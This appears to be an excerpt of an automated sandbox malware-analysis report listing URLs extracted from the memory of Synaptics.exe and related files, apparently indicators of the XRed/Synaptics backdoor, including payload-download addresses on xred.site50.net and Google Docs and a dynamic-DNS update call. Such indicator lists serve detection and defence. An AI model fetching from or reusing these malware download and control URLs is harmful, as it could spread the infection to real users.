                              Source: ~$cache1.3.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978R
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p
                              Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000003.2152405545.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.3045067074.000000001D9E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/e
                              Source: Synaptics.exe, 00000003.00000002.3004223452.000000000DC3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3017129835.00000000105BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060328812.000000002633E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3032972975.00000000185FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3029759770.0000000015CBE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.2912509915.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: ccmsetup.exe, 00000000.00000003.2037127385.0000000002600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060118245.00000000260BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3005164799.000000000E8BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3040814642.000000001D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3048085314.000000001EBBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.000000000548F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3035545859.000000001A67E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3060544260.00000000265BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3037524133.000000001BCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3033585787.0000000018D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3054482088.00000000238BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2917655340.000000000672E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3032103666.0000000017BFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3033694035.0000000018EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3036913067.000000001B6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3053663351.0000000022EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3061791893.000000002737E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3025660227.00000000135FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3053151560.000000002287E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3036210006.000000001ADFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3033079710.000000001873E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#H1FX
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#J(D
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$:ID
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%ayE
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&7/F
                              Source: Synaptics.exe, 00000003.00000002.3039114533.000000001C97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(H
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(x
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)9JEU
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)?qF
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Bitn
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-F
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Opt7
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-SiAU
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-SlBZ
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-WoW;
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-c
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c;KIEg
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-full
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-trus
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-uri
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.1
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c6v
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cRvZGgL
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cX
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.f
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.g
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gQ
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.n
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.x
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Driv
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/H4F-
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/g
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download006
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0IFG?
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1.
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download11
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download11a
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1638Z2
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1:50:
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1:50:R
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1:BD=
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2a
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3I8G
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download41638
